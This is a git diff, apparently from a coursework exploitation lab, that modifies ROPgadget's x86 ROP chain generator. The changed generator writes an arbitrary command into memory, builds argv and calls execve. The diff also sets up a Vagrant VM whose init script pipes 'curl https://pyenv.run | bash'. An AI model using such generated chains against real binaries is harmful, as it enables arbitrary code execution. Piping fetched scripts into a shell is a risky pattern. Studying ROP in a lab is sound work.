diff --git a/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py b/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py
index eda2cb1..fde87d8 100644
--- a/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py
+++ b/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py
@@ -9,7 +9,8 @@
 
 import re
 from   capstone import *
-
+from textwrap import wrap
+import sys
 
 
 class ROPMakerX86(object):
@@ -97,30 +98,34 @@ class ROPMakerX86(object):
 
         print("p = b'" + ('A' * self.paddingLen) + "'\n")
 
-        print("p += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("p += pack('<I', 0x%08x) # @ .data" %(dataAddr))
-        self.__padding(popDst, {})
+        command = "/bin/uname"
+        if len(command) % 4 > 0:
+            command = (4 - (len(command) % 4)) * "/" + command
+        command_chunks = wrap(command, 4)
 
-        print("p += pack('<I', 0x%08x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
-        print("p += b'/bin'")
-        self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
+        address = 0
+        offset = 0
+        for i, chunk in enumerate(command_chunks):
+            offset = (i * 4)
+            address = dataAddr + offset
+            print(f"p += pack('<I', 0x{popDst['vaddr']:08x}) # {popDst['gadget']}")
+            print(f"p += pack('<I', 0x{address:08x}) # @ .data + {offset}")
+            self.__padding(popDst, {})
 
-        print("p += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
-        self.__padding(write4where, {})
+            print(f"p += pack('<I', 0x{popSrc['vaddr']:08x}) # {popSrc['gadget']}")
+            print(f"p += b'{ chunk }'")
+            self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
 
-        print("p += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("p += pack('<I', 0x%08x) # @ .data + 4" %(dataAddr + 4))
-        self.__padding(popDst, {})
+            print(f"p += pack('<I', 0x{write4where['vaddr']:08x}) # {write4where['gadget']}")
+            self.__padding(write4where, {})
+            print()
 
-        print("p += pack('<I', 0x%08x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
-        print("p += b'//sh'")
-        self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr + 4}) # Don't overwrite reg dst
+        offset += 4
+        address += 4
+        print()
 
-        print("p += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
-        self.__padding(write4where, {})
-
-        print("p += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("p += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
+        print(f"p += pack('<I', 0x{popDst['vaddr']:08x}) # { popDst['gadget'] }")
+        print(f"p += pack('<I', 0x{address:08x}) # @ .data + {offset}")
         self.__padding(popDst, {})
 
         print("p += pack('<I', 0x%08x) # %s" %(xorSrc["vaddr"], xorSrc["gadget"]))
@@ -130,28 +135,59 @@ class ROPMakerX86(object):
         self.__padding(write4where, {})
 
         print("p += pack('<I', 0x%08x) # %s" %(popEbx["vaddr"], popEbx["gadget"]))
-        print("p += pack('<I', 0x%08x) # @ .data" %(dataAddr))
+        print(f"p += pack('<I', 0x{dataAddr:08x}) # @ .data")
         self.__padding(popEbx, {})
 
+        # write end + 4, after the null bytes
+        print(f"p += pack('<I', 0x{popDst['vaddr']:08x}) # {popDst['gadget']}")
+        print(f"p += pack('<I', 0x{(address + 4):08x}) # @ .data + {offset + 4}")
+        self.__padding(popDst, {})
+
+        # write the data base address, which is the start of argv
+        print(f"p += pack('<I', 0x{popSrc['vaddr']:08x}) # {popSrc['gadget']}")
+        print(f"p += pack('<I', 0x{dataAddr:08x}) # @ .data")
+        self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
+
+        # perform the write: eax -> [edx]
+        print(f"p += pack('<I', 0x{write4where['vaddr']:08x}) # {write4where['gadget']}")
+        self.__padding(write4where, {})
+
+
+
+        # ARGV MUST BE FOLLOWED BY NULL POINTER
+        print(f"p += pack('<I', 0x{popDst['vaddr']:08x}) # { popDst['gadget'] }")
+        print(f"p += pack('<I', 0x{address + 8:08x}) # @ .data + {offset + 8}")
+        self.__padding(popDst, {})
+
+        print("p += pack('<I', 0x%08x) # %s" %(xorSrc["vaddr"], xorSrc["gadget"]))
+        self.__padding(xorSrc, {})
+
+        print("p += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
+        self.__padding(write4where, {})
+
+
+        ## MEMORY LAYOUT: PROGRAM, NULL, POINTER TO ARGV WHICH FOR NOW IS BACK TO THE START, NULL
+
+
         print("p += pack('<I', 0x%08x) # %s" %(popEcx["vaddr"], popEcx["gadget"]))
-        print("p += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
+        print(f"p += pack('<I', 0x{(address + 4):08x}) # @ .data + {offset + 4}")
         self.__padding(popEcx, {"ebx": dataAddr}) # Don't overwrite ebx
 
         print("p += pack('<I', 0x%08x) # %s" %(popEdx["vaddr"], popEdx["gadget"]))
-        print("p += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
-        self.__padding(popEdx, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
+        print(f"p += pack('<I', 0x{address:08x}) # @ .data + {offset}")
+        self.__padding(popEdx, {"ebx": dataAddr, "ecx": address}) # Don't overwrite ebx and ecx
 
         print("p += pack('<I', 0x%08x) # %s" %(xorEax["vaddr"], xorEax["gadget"]))
-        self.__padding(xorEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
+        self.__padding(xorEax, {"ebx": dataAddr, "ecx": address}) # Don't overwrite ebx and ecx
 
+        # 11 = execve
         for i in range(11):
             print("p += pack('<I', 0x%08x) # %s" %(incEax["vaddr"], incEax["gadget"]))
-            self.__padding(incEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
+            self.__padding(incEax, {"ebx": dataAddr, "ecx": address}) # Don't overwrite ebx and ecx
 
         print("p += pack('<I', 0x%08x) # %s" %(syscall["vaddr"], syscall["gadget"]))
 
-        print()
-        print(r"""
+        print("""
 with open(out_file, "wb") as f:
     f.write(p)
         """)
diff --git a/Vagrantfile b/Vagrantfile
index 2881894..9f3603d 100644
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -1,5 +1,8 @@
 Vagrant.configure("2") do |config|
   config.vm.box = "generic/ubuntu1804"
-  config.vm.provision "shell", path: "init.sh"
-  config.vm.synced_folder "./", "/home/vagrant/cw"
+  config.vm.provision "shell", path: "init.sh", privileged: false
+  config.vm.synced_folder "./", "/home/vagrant/cw", type: "nfs", nfs_version: 4, "nfs_udp": false, mount_options: ["rw", "vers=4", "tcp", "nolock"]
+  config.vm.provider :libvirt do |libvirt|
+    libvirt.cpus = 4
+  end
 end
diff --git a/init.sh b/init.sh
index ee64ab0..26aa0c1 100644
--- a/init.sh
+++ b/init.sh
@@ -7,9 +7,24 @@ sudo apt-get --quiet --assume-yes install build-essential
 sudo apt-get --quiet --assume-yes install gdb
 sudo apt-get --quiet --assume-yes install gcc-multilib
 sudo apt-get --quiet --assume-yes install zsh
+sudo apt-get --quiet --assume-yes install libncurses5 libncurses5-dev libncursesw5
 
-sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev
-sudo apt-get --assume-yes --quiet install python
+sudo apt-get --assume-yes --quiet install git libssl-dev libffi-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev
+
+## pyenv
+cd /home/vagrant/ && curl https://pyenv.run | bash
+echo 'export PATH="/home/vagrant/.pyenv/bin:$PATH"' >> /home/vagrant/.bashrc
+echo 'eval "$(pyenv init -)"' >> /home/vagrant/.bashrc
+echo 'eval "$(pyenv virtualenv-init -)"' >> /home/vagrant/.bashrc
+
+export PATH="/home/vagrant/.pyenv/bin:$PATH"
+eval "$(pyenv init -)"
+eval "$(pyenv virtualenv-init -)"
+
+pyenv install 3.9.0
+pyenv global 3.9.0
+
+python3 -m pip install --upgrade setuptools
 python3 -m pip install --upgrade pip
 python3 -m pip install --upgrade pwntools
 python3 -m pip uninstall --yes ROPgadget
diff --git a/ropinstall.sh b/ropinstall.sh
index b52a1d9..06b2ba2 100755
--- a/ropinstall.sh
+++ b/ropinstall.sh
@@ -1,4 +1,4 @@
 #!/bin/bash
 
-cd ROPgadget && sudo python3 setup.py install
+cd ROPgadget && python3 setup.py install